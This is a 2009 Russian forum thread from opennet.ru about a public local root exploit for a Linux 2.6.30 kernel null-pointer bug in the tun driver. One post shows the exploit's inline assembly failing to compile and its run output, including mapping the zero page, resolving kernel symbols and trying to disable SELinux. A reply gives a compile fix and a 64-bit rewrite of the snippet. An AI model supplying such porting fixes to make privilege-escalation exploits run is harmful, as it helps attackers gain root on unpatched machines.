forum.opennet.ru

Форум Разговоры, обсуждение новостей
Вариант для распечатки		Пред. тема \| След. тема
Режим отображения отдельной подветви беседы		[ Отслеживать ]

Оглавление

Эксплоит для неисправленной в Linux ядре 2.6.30 критической ..., opennews (??), 17-Июл-09, (0) [смотреть все] +1

и почему я не удивлён , Аноним (-), 22:03 , 17-Июл-09, (1) –4 //

Наверное потому что вы давно это ждали Чтобы позлорадствовать , XoRe (ok), 00:04 , 18-Июл-09, (7) +2
Потому что аноним D, User294 (ok), 09:10 , 19-Июл-09, (14)
P S интересно, кто так новости пишет и какая его левая пятка расставляет степен, User294 (ok), 09:33 , 19-Июл-09, (15) –3 //

Уязвимость ох но критическая Ломаем вордпресс на хосте, получаем шелл неприв, pentarh (ok), 12:10 , 19-Июл-09, (19) –1 //

предварительно убедившись, что там присутствует что-то суидное, позволяющее , Хоменко (ok), 18:29 , 19-Июл-09, (22) +1

answer s rand 1 0 5 egs Может так , XoRe (ok), 19:52 , 19-Июл-09, (24)

Да нет, он стабильно их не ставит Но почему Как в том анекдоте про профессора , Хоменко (ok), 21:30 , 19-Июл-09, (26)

Локальную уязвимость в ядре, позволяющую обычному пользователю стать рутом, я от, Maxim Chirkov (ok), 19:36 , 19-Июл-09, (23) //

А сайты по части секурити с вами обычно на этот счет не согласны - обычно они не, User294 (ok), 21:53 , 20-Июл-09, (29)

При оценке степени критичности учитывается масса сопутствующих факторов, наприме, Maxim Chirkov (ok), 08:22 , 21-Июл-09, (33)

Именно Что все ресурсы по безопасности и делают В частности - один из этих факто, User294 (ok), 18:29 , 21-Июл-09, (34)

это ссылка на совершенно другую ошибку, не связанную с обсуждаемым экспоитом На, mr.morze (?), 19:25 , 21-Июл-09, (35)

Другую - это какую Я думал что в данном случае кернелу вменяется в вину обход за, User294 (ok), 21:04 , 21-Июл-09, (37)

ky6uk desu tmp cheddar_bay cheddar_bay sh pulseaudio no process found P, Ky6uk (?), 22:21 , 17-Июл-09, (2) +1
Почему неисправленной http git kernel org p linux kernel git torvalds linux-2, Capth (?), 23:06 , 17-Июл-09, (3)
заметьте он сказал что не поможет SELinux, но про grsecurity ничего не сказал, у, Amranello (?), 23:07 , 17-Июл-09, (4)
читал код сплойта вижу что это локальный эксплойт для повышения привилегий в си, hhg (ok), 23:38 , 17-Июл-09, (5) +2 //

Товарищ исчерпывающе осветил вопрос Заседание можно считать закрытым , Хоменко (ok), 04:12 , 18-Июл-09, (10) //

Как вам та же херня но под tun http www securitylab ru news 382677 php, pentarh (ok), 12:16 , 19-Июл-09, (20) –1 //

Это обсуждение этой же новости, но только в духе современного секлаба - 90 юмо, hhg (ok), 20:15 , 19-Июл-09, (25) +1
Позволю себе отметить что даже такой желтопрессный и про-виндузятнический ресурс, User294 (ok), 22:49 , 20-Июл-09, (30)

чет не получается при компиляции выдаетexploit c Assembler messages exploit c 4, Аноним (-), 23:48 , 17-Июл-09, (6) //

Во всем, конечно, виноваты x64 Новы не расстраивайтесь Дефолтный RHEL5 не уязв, alex (??), 00:49 , 18-Июл-09, (9)
gcc -m32 exploit c -o exploit А 64 битная будя так static inline unsigned long g, pavlinux (ok), 08:02 , 18-Июл-09, (13)

Шо за система Даже эксплойты не компилятся Не то, что в windows - там даже оптим, XoRe (ok), 00:06 , 18-Июл-09, (8) +2 //

В смысле, сразу поставляется отэксплойтодрюченной, с дырами , pavlinux (ok), 08:01 , 18-Июл-09, (12) +1 //

Типа того А как еще назвать сервисы работающие под SYSTEM зачем-то и большой кус, User294 (ok), 19:44 , 21-Июл-09, (36)

Неправда Ошибка явно на стороне ядра, -fdelete-null-pointer-checks прекрасно до, аноним (?), 07:00 , 18-Июл-09, (11)
У меня 2 6 28 1 январского обновления Мне стоит беспокоиться , Zenitur (?), 11:49 , 19-Июл-09, (18)
именно по поводу этой уязвимости ну чтоооо вызабейте , Аноним (-), 12:53 , 20-Июл-09, (28) +1
Хрена себе ok Сначала разыменовываем указатель, потому проверяем его валидность, аноним (?), 23:41 , 20-Июл-09, (31) //

Да gcc здесь вообще не виноват , аноним (?), 06:14 , 21-Июл-09, (32)

а с grsecurity патченным ядром наверняка работать не будет Или это тока на редха, i (??), 15:28 , 29-Июл-09, (38)

Сообщения [Сортировка по времени | RSS]

6. "Эксплоит для неисправленной в Linux ядре 2.6.30 критической ..." +/–

Сообщение от Аноним (-), 17-Июл-09, 23:48

чет не получается
при компиляции выдает
exploit.c: Assembler messages:
exploit.c:455: Error: Incorrect register `%rax' used with `l' suffix
gcc -v
Целевая архитектура: x86_64-redhat-linux
gcc версия 4.4.0 20090506 (Red Hat 4.4.0-4) (GCC)
Ругается на
    asm volatile (
    " movl %%esp, %Йx;"
    " andl %1, %Йx;"
    " movl (%Йx), %0;"
    : "=r" (current)
    : "i" (0xfffff000)
    );
если заменить
" movl (%Йx), %0;"
на
" mov (%Йx), %0;"
компилится, но exploit тогда не работает
./exploit
[+] MAPPED ZERO PAGE!
[+] Resolved tun_fops to 0xffffffffa0b74830
[+] Resolved selinux_enforcing to 0xffffffff81872374
[+] Resolved nf_unregister_hooks to 0xffffffff8132b9fa
[+] Resolved security_ops to 0xffffffff8186fb20
[+] Resolved default_security_ops to 0xffffffff8159f090
[+] Resolved sel_read_enforce to 0xffffffff81189104
[+] Resolved audit_enabled to 0xffffffff8182c804
[+] Resolved commit_creds to 0xffffffff81061597
[+] Resolved init_cred to 0xffffffff8158fa10
[+] *0xffffffffa0b74888 |= 1
[+] b00m!
[+] Disabled security of : nothing, what an insecure machine!
[+] Failed to get root :( Something's wrong.  Maybe the kernel isn't vulnerable?
Где что не так?

Ответить | Правка | Наверх | Cообщить модератору

9. "Эксплоит для неисправленной в Linux ядре 2.6.30 критической ..." +/–

Сообщение от alex (??), 18-Июл-09, 00:49

Во всем, конечно, виноваты x64. Новы не расстраивайтесь. Дефолтный RHEL5 не уязвим. Уязвимость добавили ( бэкпортировали :-) ) в тестовых ядрах, которые могли попасть в 5.4.
Но теперь не попадет.

Ответить | Правка | Наверх | Cообщить модератору

13. "Эксплоит для неисправленной в Linux ядре 2.6.30 критической ..." +/–

Сообщение от pavlinux (ok), 18-Июл-09, 08:02

>чет не получается
>при компиляции выдает
>exploit.c: Assembler messages:
>exploit.c:455: Error: Incorrect register `%rax' used with `l' suffix
>Где что не так?
gcc -m32 exploit.c -o exploit
А 64 битная будя так
static inline unsigned long get_current(void)
{
        unsigned long current;
        asm volatile (
        " movq %%rsp, %%rax;"
        " andq %1, %%rax;"
        " movq (%%rax), %0;"
        : "=r" (current)
        : "i" (0xfffff000)  /* вот тут надо разбираться,  старшие нужны или младшие */
        );
        return current;
}

Ответить | Правка | К родителю #6 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру

6. "Эксплоит для неисправленной в Linux ядре 2.6.30 критической ..."	+/–
Сообщение от Аноним (-), 17-Июл-09, 23:48
чет не получается при компиляции выдает exploit.c: Assembler messages: exploit.c:455: Error: Incorrect register `%rax' used with `l' suffix gcc -v Целевая архитектура: x86_64-redhat-linux gcc версия 4.4.0 20090506 (Red Hat 4.4.0-4) (GCC) Ругается на asm volatile ( " movl %%esp, %Йx;" " andl %1, %Йx;" " movl (%Йx), %0;" : "=r" (current) : "i" (0xfffff000) ); если заменить " movl (%Йx), %0;" на " mov (%Йx), %0;" компилится, но exploit тогда не работает ./exploit [+] MAPPED ZERO PAGE! [+] Resolved tun_fops to 0xffffffffa0b74830 [+] Resolved selinux_enforcing to 0xffffffff81872374 [+] Resolved nf_unregister_hooks to 0xffffffff8132b9fa [+] Resolved security_ops to 0xffffffff8186fb20 [+] Resolved default_security_ops to 0xffffffff8159f090 [+] Resolved sel_read_enforce to 0xffffffff81189104 [+] Resolved audit_enabled to 0xffffffff8182c804 [+] Resolved commit_creds to 0xffffffff81061597 [+] Resolved init_cred to 0xffffffff8158fa10 [+] *0xffffffffa0b74888 \|= 1 [+] b00m! [+] Disabled security of : nothing, what an insecure machine! [+] Failed to get root :( Something's wrong. Maybe the kernel isn't vulnerable? Где что не так?
Ответить \| Правка \| Наверх \| Cообщить модератору


	9. "Эксплоит для неисправленной в Linux ядре 2.6.30 критической ..."	+/–
	Сообщение от alex (??), 18-Июл-09, 00:49
	Во всем, конечно, виноваты x64. Новы не расстраивайтесь. Дефолтный RHEL5 не уязвим. Уязвимость добавили ( бэкпортировали :-) ) в тестовых ядрах, которые могли попасть в 5.4. Но теперь не попадет.
	Ответить \| Правка \| Наверх \| Cообщить модератору


	13. "Эксплоит для неисправленной в Linux ядре 2.6.30 критической ..."	+/–
	Сообщение от pavlinux (ok), 18-Июл-09, 08:02
	>чет не получается >при компиляции выдает >exploit.c: Assembler messages: >exploit.c:455: Error: Incorrect register `%rax' used with `l' suffix >Где что не так? gcc -m32 exploit.c -o exploit А 64 битная будя так static inline unsigned long get_current(void) { unsigned long current; asm volatile ( " movq %%rsp, %%rax;" " andq %1, %%rax;" " movq (%%rax), %0;" : "=r" (current) : "i" (0xfffff000) /* вот тут надо разбираться, старшие нужны или младшие */ ); return current; }
	Ответить \| Правка \| К родителю #6 \| Наверх \| Cообщить модератору